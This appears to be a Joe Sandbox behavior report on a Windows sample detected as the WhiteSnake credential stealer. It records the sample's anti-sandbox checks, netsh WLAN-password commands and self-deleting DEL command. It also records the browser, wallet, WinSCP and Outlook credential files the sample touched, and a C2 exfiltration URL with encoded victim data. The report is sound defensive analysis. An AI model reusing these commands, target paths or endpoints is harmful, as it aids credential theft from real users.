Source: C:\Users\user\Desktop\file.exe TID: 4672	Thread sleep time: -598401s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598684	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598570	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598401	Jump to behavior

Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.2085420420.000002067E618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe	Binary or memory string: qemu'@
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2085420420.000002067E618000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.2078691178.00000206100D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: file.exe, h0R3qT.cs	Reference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, jil.Id)
Source: file.exe, h0R3qT.cs	Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
Source: file.exe, bFwG.cs	Reference to suspicious API methods: GetProcAddress(disT, nW)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3144, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Electrum\wallets
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: >%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %exodus.conf.json;exodus.wallet\*.seco
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Exodus
Source: file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: &%LocalAppData%\Coinomi\Coinomi\wallets
Source: file.exe, 00000000.00000002.2074990140.0000020600582000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\ledger live

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 3144, type: MEMORYSTR

Remote Access Functionality

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 3144, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Timestomp	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	HEUR/AGEN.1307453
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://101.126.19.171:443	0%	Avira URL Cloud	safe
http://18.228.80.130:80	0%	Avira URL Cloud	safe
http://168.138.211.88:8099	0%	Avira URL Cloud	safe
http://47.110.140.182:8080	0%	Avira URL Cloud	safe
http://47.96.78.224:8080	0%	Avira URL Cloud	safe
http://167.99.138.249:8080	0%	Avira URL Cloud	safe
http://185.217.98.121:80	0%	Avira URL Cloud	safe
http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==	0%	Avira URL Cloud	safe
http://66.42.56.128:80	0%	Avira URL Cloud	safe
https://44.228.161.50:443	0%	Avira URL Cloud	safe
http://129.151.109.160:8080	0%	Avira URL Cloud	safe
http://101.126.19.171:80	0%	Avira URL Cloud	safe
http://91.223.3.164:8080/sendData	0%	Avira URL Cloud	safe
http://95.216.147.179:80	0%	Avira URL Cloud	safe
http://8.134.71.132:8082	0%	Avira URL Cloud	safe
http://91.223.3.164:8080	0%	Avira URL Cloud	safe
http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un	0%	Avira URL Cloud	safe
http://46.4.73.118:9000	0%	Avira URL Cloud	safe
http://91.223.3.164:80802	0%	Avira URL Cloud	safe
http://101.132.223.26:8080	0%	Avira URL Cloud	safe
http://45.82.65.63:80	0%	Avira URL Cloud	safe
http://206.189.109.146:80	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line?fields=query,country	false		high
http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.217.98.121:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://138.2.92.67:443	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.161.20.142:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://5.196.181.135:443	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://44.228.161.50:443	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://101.43.160.136:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://47.110.140.182:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://192.99.196.191:443	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://168.138.211.88:8099	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://101.126.19.171:443	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://18.228.80.130:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://66.42.56.128:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://167.99.138.249:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.00000206000DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.217.98.121:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://8.219.110.16:9999	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://47.96.78.224:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://129.151.109.160:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://95.216.147.179:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://154.9.207.142:443	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://8.134.71.132:8082	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.or	file.exe, 00000000.00000002.2074990140.00000206001E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://206.166.251.4:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://194.164.198.113:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com/line?fields=query	file.exe, 00000000.00000002.2074990140.00000206000BD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://159.203.174.113:8090	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://101.126.19.171:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.223.3.164:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://91.223.3.164:8080/sendData	file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high
http://116.202.101.219:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://91.223.3.164:80802	file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://38.60.191.38:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://46.4.73.118:9000	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.223.3.164:8080/sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un	file.exe, 00000000.00000002.2074990140.000002060012F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://101.132.223.26:8080	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://206.189.109.146:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	file.exe, 00000000.00000002.2078691178.000002061015A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.82.65.63:80	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	file.exe, 00000000.00000002.2078691178.000002061014A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2078691178.0000020610152000.00000004.00000800.00020000.00000000.sdmp	false		high
http://41.87.207.180:9090	file.exe, 00000000.00000002.2074990140.0000020600001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000002.2078691178.0000020610930000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
91.223.3.164	unknown	Poland		201814	PL-SKYTECH-ASPL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1550646
Start date and time:	2024-11-07 00:06:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/3@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 71% Number of executed functions: 8 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
